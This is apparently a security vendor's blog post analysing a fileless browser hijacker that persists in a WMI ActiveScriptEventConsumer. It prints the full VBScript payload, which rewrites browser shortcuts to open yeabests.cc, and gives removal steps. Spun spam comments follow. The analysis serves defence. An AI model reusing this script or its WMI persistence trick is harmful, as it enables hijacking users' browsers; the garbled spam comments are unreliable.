Recently, we discovered browser hijacker altering shortcuts by inserting http://yeabests.cc argument. When you open your browser, instead of your favorite search engine, you will be presented with this one:
This is nothing new when it comes to browser hijacking, I would say it’s well-known trick, but I was fascinated by how this malware works and the idea they came up with to stay undetected by altering your shortcuts over and over again after cleaning.
This so-called fileless malware lives inside WMI (Windows Management Instrumentation) or more precisely, as a Visual Basic script inside ActiveScriptEventConsumer class.
The script is executed by the WMI Standard Event Consumer scripting application, which can be found in the WMI folder in %system32%\wbem\scrcons.exe. Of course, this makes the script hard to detect since it uses a not-so-common WMI application scrcons.exe rather than the traditional JS application wscript.exe.
Windows built-in application wbemtest.exe or WMIExplorer can be used to access this script.
Below is the content of VBScript used to hijack browsers:
Dim objFS Set objFS = CreateObject("Scripting.FileSystemObject") On Error Resume Next Const link = "http://yeabests.cc" browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe") Set BrowserDic = CreateObject("scripting.dictionary") For Each browser In browsers BrowserDic.Add LCase(browser), browser Next Dim FoldersDic(12) Set WshShell = CreateObject("Wscript.Shell") FoldersDic(0) = "C:\Users\Public\Desktop" FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu" FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs" FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" FoldersDic(4) = "C:\Users\Rafael\Desktop" FoldersDic(5) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu" FoldersDic(6) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" FoldersDic(7) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" FoldersDic(8) = "C:\Users\Rafael\AppData\Roaming" FoldersDic(9) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch" FoldersDic(10) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu" FoldersDic(11) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar" Set fso = CreateObject("Scripting.Filesystemobject") For i = 0 To UBound(FoldersDic) For Each file In fso.GetFolder(FoldersDic(i)).Files If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then set oShellLink = WshShell.CreateShortcut(file.Path) path = oShellLink.TargetPath name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path) If BrowserDic.Exists(LCase(name)) Then oShellLink.Arguments = link If file.Attributes And 1 Then file.Attributes = file.Attributes - 1 End If oShellLink.Save End If End If Next Next createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0
As you can see, malware is able to hijack 14 different browsers by checking their executables:
IEXPLORE.EXE
chrome.exe
firefox.exe
360chrome.exe
360SE.exe
SogouExplorer.exe
opera.exe
Safari.exe
Maxthon.exe
TTraveler.exe
TheWorld.exe
baidubrowser.exe
liebao.exe
QQBrowser.exe
Zemana AntiMalware removes this malware and cleans altered shortcuts.
Manual removal
The manual removal of this malware isn’t hard at all.
- Press Windows button + R on your keyboard at the same time. Type wbemtest and click OK
- Windows Management Instrumentation Tester window will open. Click Connect.
- Type root\subscription.
- Click Open Class on the next window and type ActiveScriptEventConsumer.
- Now you need to click Instances.
- And then finally remove this malware.
The only thing left is to remove argument from your browser shortcuts.
- Right click on desired shortcut and select Properties.
- Remove http://yeabests.cc argument after “
- Click OK to apply changes.
Save yourself the hassle and install Zemana AntiMalware.
Additional Information:
Md5: a718bf376567abd3e7de06f31b036405
VirusTotal: Yeabests installer
Resources:
Leave a Reply
This site uses Akismet to reduce spam. Learn how your comment data is processed.
You just saved my day! Thanks!
Trojan steed contaminations have dependably been a danger that made repulsiveness among web clients and this is for the most part since they were made for the fundamental reason for permitting outsiders and programmers access to any framework and thus may turn out to be more destructive than infection programs. my review here
A particular element of the thieves is that they take the client's program under full control, and don't leave him a shot. The program changes the settings of the program, the default internet searcher and uncovered its own landing page. https://how-to-remove.org/malware/browser-hijacker-removal/gotowebs-com-removal/
While the systems do have some shortages, they have gained aesoponlinelogins Automated systems streamline the procedure both for managers alternatives.
So quit.